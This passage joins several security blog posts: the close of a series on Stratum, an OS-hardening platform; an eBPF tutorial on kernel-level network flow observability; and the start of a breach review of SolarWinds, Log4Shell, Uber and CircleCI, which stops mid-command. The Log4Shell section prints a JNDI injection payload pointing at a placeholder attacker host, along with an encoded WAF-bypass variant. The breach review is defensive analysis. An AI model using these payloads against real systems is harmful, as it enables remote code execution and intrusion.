  • The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
  • Installation is a single helm install or docker compose up — the platform runs in your environment

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.


I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn’t the tooling — it’s the integration layer that ties them together into a reproducible, auditable pipeline.

Stratum is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.


The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.


Installation

Stratum runs as a set of containers. Kubernetes or Docker Compose both work.

Kubernetes (Helm):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m

Docker Compose (single-node):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080

The Three Extension Points

1. Custom Compliance Controls

Add controls that aren’t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:

# controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: "grep -E '^max_log_file_action' /etc/audit/auditd.conf"
  expected: "max_log_file_action = keep_logs"
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: '^max_log_file_action'
        line: 'max_log_file_action = keep_logs'

Deploy the custom control:

stratum controls deploy --file controls/custom-audit-policy.yaml

Reference it in any blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001

Custom controls appear in the grade calculation and SARIF output alongside CIS controls.

2. Provider Plugins

Add support for a new cloud provider by implementing the provider interface:

# providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = "my-cloud"

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...

Register the plugin:

stratum providers register --file providers/custom_provider.py --name my-cloud

The provider is now available as --provider my-cloud in all stratum build commands.

3. Pipeline Integrations

Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:

# Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}

The Open-Core Model

Stratum follows the same model as the tools that have become infrastructure standards:

Tool Open-core model
Terraform / OpenTofu Core OSS, enterprise features in paid tier
Cilium / Isovalent Core OSS, enterprise support/features in paid tier
Vault / HCP Vault Core OSS, hosted/enterprise in paid tier
Stratum Engine + blueprint + scanner + Pipeline API: Apache 2.0

Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.

The repository is at: github.com/rrskris/Stratum


What This Series Taught

EP01 — EP06 in one view:

Episode What you learned What Stratum does
EP01 Default AMIs are insecure by design Replaces default AMI with a hardened golden image
EP02 Blueprint as code — the 2am skip disappears HardeningBlueprint YAML — 5-step wizard or direct YAML
EP03 One blueprint, six providers, no drift 6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox
EP04 Automated OpenSCAP — grade at build time Compliance Scanner: A-F, SARIF, drift detection
EP05 CI/CD gate — the unhardened image never deploys Pipeline API: POST /api/pipeline/scan
EP06 The platform — OSS, self-hostable, extendable Apache 2.0, Helm install, three extension points

What’s Next

This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.

If you’ve been following the eBPF: From Kernel to Cloud series, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.

The next series: Purple Team Playbook — real attack paths against cloud and Kubernetes infrastructure, how they’re detected, and how they’re closed. Starting May 8.

GitHub: github.com/rrskris/Stratum

Get the Purple Team series in your inbox → linuxcent.com/subscribe

Network Flow Observability — What Every Connection Reveals

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 10
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability


Architecture Overview

eBPF Network Flow Observability — Hubble and Cilium architecture for zero-instrumentation flow monitoring
Hubble captures every packet decision at the eBPF layer — no sidecar, no app changes, no sampling.

TL;DR

  • Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling
    (TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)
  • APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from
  • Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface
  • Cilium’s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters — they run TC programs, collect perf_event or ringbuf events, and expose them over an API
  • You can verify what flow data a tool is actually collecting with four bpftool commands — without reading documentation
  • Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces

EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.

Quick Check: What Flow Data Is Your Cluster Already Collecting?

Before building anything new, check what’s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:

# SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action
# What maps are those programs holding state in?
bpftool map list | grep -E "flow|conn|sock|nat"

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B

Each lxcXXXX interface is a pod’s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see prog_id values on pod interfaces, your cluster is already doing kernel-level flow collection.

Not running Cilium? On a plain kubeadm or EKS node without a CNI that uses eBPF, bpftool net list will show no TC programs on pod interfaces — just whatever kube-proxy or the CNI plugin installed. You can still attach your own flow programs with tc qdisc add dev eth0 clsact — that’s the starting point this episode covers.


The client opened a ticket on a Tuesday afternoon. “Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.”

I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh’s perspective. The payment gateway team said their side looked clean.

Three tools. Three different answers. All of them interpreting the network. None of them were the network.

I ran:

bpftool map dump id 24 | grep -A5 "payment-gateway-ip"

The connection tracking map showed retransmit count 14 for a specific (src_ip, dst_ip, src_port, dst_port) tuple — the same 5-tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it “elevated.”

The kernel had the truth. Everything above it was rounding.


Why Application-Level Metrics Miss What the Kernel Sees

Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer “did this request succeed?” not “what did the network do to make it succeed?”

The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application’s perspective, a request that required 3 retransmits before the ACK arrived looks identical to one that succeeded on the first attempt — slightly slower, but successful.

This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel’s TCP implementation does not report upward when it retransmits. It just retransmits.

eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.


How TC Hook Flow Programs Work

EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.

Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST, retransmit bit)
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store

ringbuf — a BPF ring buffer: a lock-free, memory-efficient queue shared between a kernel eBPF program and a userspace consumer. The kernel program writes events; the userspace reader drains them. Used instead of perf_event_array in kernel 5.8+ because it avoids per-CPU memory waste and supports variable-length records. When you see Hubble exporting flows, it’s reading from a ringbuf that the TC program writes to.

The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.


What Retransmit Telemetry Actually Reveals

Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.

A TCP retransmit happens when a sender doesn’t receive an ACK within the retransmission timeout (RTO). The kernel resends the segment and doubles the timeout (exponential backoff). From the application’s perspective, the call takes longer. If retransmits keep clearing, the application sees success — just slow success.

perf_event — a kernel mechanism for collecting performance data. In eBPF, BPF_MAP_TYPE_PERF_EVENT_ARRAY lets kernel programs push variable-length records to userspace readers via a ring buffer per CPU. Older tools use perf_event_array; newer ones use BPF_MAP_TYPE_RINGBUF (single shared ring, more efficient). If you inspect an older version of Cilium’s flow exporter, you’ll see perf_event writes; newer versions use ringbuf.

To observe retransmits directly with bpftrace:

# Count retransmit events per destination IP — run for 60 seconds
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
'

Sample output:

Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic

847 retransmits to a single endpoint in 60 seconds. That’s not noise. That’s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into “elevated latency.”


How Cilium Hubble Collects Flow Data

Hubble is the flow observability layer built into Cilium. Understanding how it works makes you able to reason about what it can and cannot see — and how to verify what it’s actually collecting.

Hubble’s architecture:

Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF ringbuf
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter

The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.

To see what Hubble’s TC programs have attached:

# On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Hubble flow program on pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Hubble flow program on pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64
# Inspect one of those programs to confirm it's reading flow metadata
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142

sched_cls is the BPF program type for TC — confirming these are TC-attached flow programs. map_ids 24,31,38 — those are the maps this program reads from and writes to. You can dump any of them:

bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     "key": {
#         "saddr": "10.244.1.5",        # ← source pod IP
#         "daddr": "172.16.4.23",        # ← destination IP
#         "sport": 48291,                # ← source port
#         "dport": 443,                  # ← destination port
#         "nexthdr": 6,                  # ← protocol: TCP
#         "flags": 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     "value": {
#         "rx_packets": 14832,           # ← packets received
#         "tx_packets": 14831,           # ← packets sent
#         "rx_bytes": 3841024,           # ← bytes received
#         "tx_bytes": 3756288,           # ← bytes sent
#         "lifetime": 21600,             # ← seconds until entry expires
#         "rx_closing": 0,
#         "tx_closing": 0
#     }
# }]

That’s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters the kernel is maintaining for that 5-tuple.


Writing a Minimal Flow Observer with bpftrace

You don’t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:

# Persistent flow table: connections + packet counts for 2 minutes
bpftrace -e '
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    $dport = $sk->__sk_common.skc_dport >> 8;
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
' --timeout 120

Sample output (every 30 seconds):

@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod

For retransmit tracking specifically:

# Combined flow + retransmit watcher — runs until Ctrl-C
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @retx[comm, $daddr] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @sends[comm, $daddr] = count();
}
interval:s:10 {
    printf("=== Retransmit ratio (last 10s) ===\n");
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
'

This gives you both the volume of sends and the retransmit count side by side — the ratio tells you whether retransmits are a rounding error (0.01%) or a signal (5%+).


⚠ Production Gotchas

Map size bounds matter. Connection tracking maps default to tens of thousands of entries. On nodes with high connection churn (serverless, short-lived batch jobs), maps can fill and start dropping new entries silently. Check bpftool map show id N for max_entries and monitor map utilization. Cilium exposes this as cilium_bpf_map_pressure in Prometheus.

Per-packet overhead on high-throughput interfaces. A TC program that fires on every packet on a 10Gbps interface processes millions of packets per second. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable — Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use ringbuf write paths or aggregate before emitting.

TC hook placement and direction confusion. Ingress TC on a pod’s veth (lxcXXXX) sees egress traffic from the pod’s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you’re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.

Retransmit counters reset on connection close. If you’re tracking retransmit totals for a long-lived connection, the count is stored in the kernel’s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.

Hubble flow visibility requires pod interfaces. Hubble only sees traffic that crosses a pod’s veth interface. Node-to-node traffic that doesn’t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (eth0, ens3), not just on pod veth pairs.


Quick Reference

What you want to see Command
What TC programs are attached bpftool net list
Which maps a program uses bpftool prog show id N (check map_ids)
Connection tracking entries bpftool map dump id N
Retransmits per destination bpftrace -e 'kprobe:tcp_retransmit_skb { ... }'
Flow counts per process bpftrace -e 'kprobe:tcp_sendmsg { @[comm, daddr] = count(); }'
Hubble flow stream (Cilium) hubble observe --follow
Hubble flows for one pod hubble observe --pod mynamespace/mypod --follow
Verify map pressure bpftool map show id N (check max_entries vs entries)
Kernel function What it marks
tcp_sendmsg Data being sent on a TCP socket
tcp_recvmsg Data being received on a TCP socket
tcp_retransmit_skb A segment being retransmitted
tcp_send_reset RST being sent
tcp_fin Connection teardown initiated
tcp_connect New outbound TCP connection attempt

Key Takeaways

  • Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports
  • Retransmit telemetry from tcp_retransmit_skb reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools
  • Cilium Hubble, Pixie, and Retina are all eBPF flow exporters — they run TC programs, drain a ringbuf, enrich with Kubernetes metadata, and expose the result over an API
  • You can verify what any flow tool is actually collecting with bpftool net list, bpftool prog show, and bpftool map dump — four commands, no documentation needed
  • Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure
  • The kernel’s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains

What’s Next

Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you’re not watching the kernel-level DNS path, you won’t see it until after the damage.

DNS observability at the kernel level uses tracepoint hooks on the DNS syscall path — the same ground-truth approach as flow telemetry, but for name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.

Next: DNS observability at the kernel level — what your pods are actually resolving

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

Cloud Security Breaches 2020–2025: What Actually Got Exploited

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident falls into at least one
  • SolarWinds (Dec 2020): build pipeline compromise — attacker signed malware with a legitimate cert (A08)
  • Log4Shell (Dec 2021): injection in a logging library present in millions of Java apps (A03)
  • Uber (Sep 2022): MFA fatigue against a contractor → hardcoded admin creds on internal share (A07 + A02)
  • CircleCI (Jan 2023): session token stolen from an engineer’s laptop → CI/CD secrets exfiltrated (A07 + A08)
  • Okta (Oct 2023): support system access via stolen credentials → customer tenant data exposed (A07)
  • XZ Utils (Apr 2024): 2-year social engineering campaign → backdoor in release tarball (A08 + A06)
  • The attack surface does not change — only the specific vector within each category

OWASP Mapping: This episode is cross-category — A01 through A10 all appear. Each breach is annotated with its primary OWASP mapping.


The Big Picture

┌────────────────────────────────────────────────────────────────────┐
│           2020–2025 BREACH TIMELINE                                │
│                                                                    │
│  Dec 2020    Dec 2021    Sep 2022    Jan 2023    Oct 2023  Apr 2024 │
│     │            │           │           │           │        │    │
│     ▼            ▼           ▼           ▼           ▼        ▼    │
│  Solar-      Log4Shell     Uber       CircleCI     Okta    XZ Utils│
│  Winds                                                             │
│                                                                    │
│  ══════════════════════════════════════════════════════════        │
│                                                                    │
│  Root Cause Categories (3 total):                                  │
│                                                                    │
│  SUPPLY CHAIN          IDENTITY               MISCONFIGURATION     │
│  SolarWinds            Uber                   Capital One (2019)   │
│  XZ Utils              Okta                   CircleCI (partial)   │
│  Log4Shell (partial)   CircleCI (initial)                          │
│                                                                    │
│  OWASP Primaries:                                                  │
│  A08 → A07 → A07 → A07/A08 → A07 → A08/A06                       │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

The cloud security breaches from 2020 to 2025 reveal a consistent pattern: attackers are not finding new classes of vulnerability. They are exploiting the same three root causes — identity, supply chain, misconfiguration — in different combinations against different technology stacks.


Why These Breaches Are the Curriculum

Every episode in this series from EP04 onward takes a specific attack path from these incidents and walks through the simulation, detection, and fix. You cannot understand the fix without understanding the breach mechanics. And you cannot understand why your detection didn’t fire without knowing what the attacker actually did.

This episode is the reference. When EP05 covers MFA fatigue, it builds on the Uber anatomy here. When EP09 covers XZ Utils, the supply chain mechanics here are the foundation.


December 2020: SolarWinds — Supply Chain at Scale

OWASP: A08 (Software and Data Integrity Failures)

SolarWinds is the incident that defined supply chain attacks for the decade. The attacker — attributed to Russia’s SVR — compromised the build environment for SolarWinds Orion IT monitoring software in early 2020. They inserted a backdoor called SUNBURST into the software build pipeline.

The mechanics:

Normal build pipeline:
  Source code → Build system → Sign with SolarWinds cert → Distribute → Customer installs

Compromised pipeline (SolarWinds):
  Source code → Build system → [SUNBURST injected here] → Sign with SolarWinds cert → Distribute → 18,000 customers install

SUNBURST was signed with SolarWinds’ legitimate Authenticode certificate. It passed signature verification. It was distributed through the normal software update mechanism. Customers with automatic updates installed it because the update was signed by a trusted vendor.

The backdoor remained dormant for 12–14 days after installation before activating. It used DGA (domain generation algorithm) to contact C2 infrastructure, disguising traffic as Orion telemetry. After the initial beaconing period, the attacker manually selected targets from the 18,000 infected environments.

Confirmed affected organizations: US Treasury, US Commerce Department, FireEye, Microsoft, Intel, Deloitte.

What a detection would have looked like:
– Unexpected outbound DNS queries to avsvmcloud.com subdomains
– Orion software making network connections outside its normal profile
– New scheduled tasks or service modifications by the Orion process

The structural failure: The build system was not isolated, not monitored for unexpected behavior, and the build process itself was not reproducible from source. A reproducible build would have made the SUNBURST injection detectable — the build output would not match the source.


December 2021: Log4Shell — Injection in a Logging Library

OWASP: A03 (Injection), A06 (Vulnerable and Outdated Components)

Log4Shell (CVE-2021-44228) is the closest thing to a universal vulnerability that existed in the 2020s. Log4j 2.x was embedded in thousands of Java applications — not as a direct dependency but as a transitive dependency, often several layers deep in the dependency tree. Developers frequently didn’t know they were running it.

The vulnerability: Log4j evaluated JNDI (Java Naming and Directory Interface) lookups embedded in logged strings. Any input that ended up in a log message could trigger a JNDI lookup:

${jndi:ldap://attacker.com/exploit}

# Log4j evaluates the expression, makes LDAP request to attacker.com
# Attacker's LDAP server responds with a Java class
# Log4j loads and executes the class
# Result: remote code execution

The attack was trivial to launch and extremely difficult to fully enumerate exposure for — because Log4j was present as a transitive dependency in components that teams didn’t know they owned.

What made it particularly bad for cloud infrastructure:
– Lambda functions, ECS containers, EKS workloads, and Elastic Beanstalk apps all potentially affected
– WAFs were initially bypassed with encoding variants (${${lower:j}ndi:...})
– The vulnerable class wasn’t in the primary JAR — it was in log4j-core, which appeared as an indirect dependency

# Find Java applications that might include log4j (rough scan — requires access to filesystems)
find / -name "log4j*.jar" -o -name "log4j-core*.jar" 2>/dev/null

# In a Kubernetes context — check running container images for log4j
kubectl get pods -A -o json | \
  jq -r '.items[].spec.containers[].image' | \
  sort -u
# Then scan each image: trivy image --severity CRITICAL <image>

The fix was patching — upgrading Log4j to 2.17.0+. The mitigation was log4j2.formatMsgNoLookups=true or removing the JndiLookup class from the classpath. Neither mitigation addressed the root cause of having an outdated component with critical CVE.


September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

OWASP: A07 (Identification and Authentication Failures), A02 (Cryptographic Failures)

The Uber breach is a clean illustration of attack chaining: one authentication failure enables discovery of a second authentication failure.

Minute-by-minute anatomy:

  1. Attacker purchases Uber contractor credentials on a criminal marketplace (or phishes them directly)
  2. Contractor has MFA enrolled — Duo push notifications
  3. Attacker initiates login repeatedly, triggering Duo push notifications to contractor’s phone
  4. Contractor rejects 3–4 push notifications
  5. Attacker sends WhatsApp message to contractor’s phone: “Hi, this is IT support. We’re having an issue with your account. Please accept the next Duo notification.”
  6. Contractor accepts
  7. Attacker is in

From inside the Uber network, the attacker found a network share accessible to contractors. On that share: a PowerShell script. In that script: hardcoded admin credentials for Thycotic, Uber’s privileged access management (PAM) system.

With Thycotic admin access, the attacker retrieved credentials for: AWS, GCP, GSuite, VMware, Slack, HackerOne. Full internal access.

The two failures:
– A07: Push-notification MFA that can be defeated by social engineering + fatigue
– A02: Admin credentials in a plaintext PowerShell script on a network share

# Detect MFA fatigue attempts in Okta logs (if Okta is the IdP)
# Query: multiple MFA push rejections followed by acceptance within short window
# In Okta System Log API:
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&since=2024-01-01T00:00:00Z" | \
  jq '[.[] | select(.outcome.result == "FAILURE")] | group_by(.actor.id) | map({user: .[0].actor.displayName, failures: length}) | sort_by(.failures) | reverse | .[0:10]'

The structural fix for MFA fatigue is not user training. It is replacing push-notification MFA with phishing-resistant MFA: FIDO2 hardware keys (YubiKey) or passkeys. A hardware key requires physical presence — a WhatsApp message cannot convince a hardware key to authenticate.


January 2023: CircleCI — Session Token Theft and Secret Exfiltration

OWASP: A07 (Authentication Failures), A08 (Software and Data Integrity Failures)

CircleCI disclosed in January 2023 that an attacker had accessed customer data — specifically, environment variables, tokens, and keys stored by customers in CircleCI’s secret storage.

The attack chain:

  1. Malware on a CircleCI engineer’s laptop stole a 2FA-backed SSO session token
  2. The session token was valid and not yet expired — no MFA re-challenge for the session
  3. Attacker used the session token to access CircleCI’s internal systems
  4. From internal systems, attacker accessed the production database containing encrypted customer secrets
  5. The encryption keys were also accessible — attacker obtained both

The attack did not break encryption. It circumvented encryption by accessing the keys through internal systems that the compromised session token could reach.

What customers stored in CircleCI that was exposed:
– AWS IAM access keys and secret keys
– GitHub tokens
– DockerHub credentials
– SSH private keys
– API tokens for third-party services

The scale: CircleCI could not enumerate which customer secrets were accessed — they notified all customers with environment variables stored in the system.

# After a CI/CD platform breach: rotate all credentials that were stored there
# Start with AWS credentials — find and disable exposed access keys

# List all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "$user" \
      --query "AccessKeyMetadata[].{User:'$user',Key:AccessKeyId,Status:Status,Created:CreateDate}" \
      --output table
  done

# Disable a specific access key
aws iam update-access-key \
